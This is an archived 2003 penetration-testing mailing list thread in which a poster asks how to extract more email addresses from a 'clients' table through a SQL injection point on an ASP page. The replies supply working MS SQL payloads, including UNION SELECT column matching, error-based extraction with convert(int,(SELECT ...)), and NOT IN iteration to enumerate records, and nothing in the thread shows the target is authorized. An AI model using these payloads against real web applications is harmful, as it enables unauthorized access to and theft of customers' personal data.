Penetration Testing mailing list archives
Re: SQL injection - get more values
From: Thaidn <thaidn () idealscript com>
Date: Thu, 13 Feb 2003 10:52:22 +0700
Hello dude, You cant use "union" or "having" when the original query looks like "select * from table" or "select image from table", but this disadvantage can be bypass easily when using convert(int,(your injected query)). Just put an " ' and convert(int,(injected query)), all data is in your hand :D. On Thursday 13 February 2003 01:51 am, Panos Dimitriou wrote:
One solution is to try to find the exact columns to perform a union select by replacing 1s with 'foo' when you get the error message " operand type clash: text is incompatible with int" Example: ') union all select sum(email),1,1,1.... from clients-- until you get: operand type clash: text is incompatible with int Then change the last 1 with 'foo' and continue with 1s, and so on and so forth. The other solution is to try to get all the data through error cycling, as you already tried and use NOT IN as follows: ' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in ('anon () isp com','othermail () isp net',...))) %2b ' I hope this works Panos Dimitriou Director, MSS -----Original Message----- From: Daniel Savi [mailto:dss () brturbo com] Sent: Wednesday, February 12, 2003 7:49 PM To: pen-test () securityfocus com Subject: SQL injection - get more values Hi :) i'm trying to get some info from clients table and email field.... i try this param into gubpage.asp?=... ') union select sum(email) from clients-- and got error about all queries needed...so, i tryed to solve with ') union select sum(email),1,1,1.... from clients-- until i get: operand type clash: text is incompatible with int i found this answer into this forum (thanks :)), was: ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b ' i got this: Syntax error converting the varchar value 'anon () isp com' to a column of data type int Now, my problem: How can i get other e-mail from table knowing one valid value? i try this ' %2b convert(int, (SELECT email FROM clients WHERE email'anon () isp com')) %2b 'but no success i think i can use NOT iN, but not sure how to use with convert... Any tip are welcome! Thanks ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ --------------------------------------------------------------------------- - This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL injection - get more values Daniel Savi (Feb 12)
- RE: SQL injection - get more values Panos Dimitriou (Feb 12)
- RE: SQL injection - get more values Cesar (Feb 12)
- Re: SQL injection - get more values Thaidn (Feb 13)
- Re: SQL injection - get more values Thaidn (Feb 12)
- Re: SQL injection - get more values Kevin Spett (Feb 13)
- Re: SQL injection - get more values Kevin Spett (Feb 12)
- <Possible follow-ups>
- RE: SQL injection - get more values Brass, Phil (ISS Atlanta) (Feb 12)
- RE: SQL injection - get more values Panos Dimitriou (Feb 12)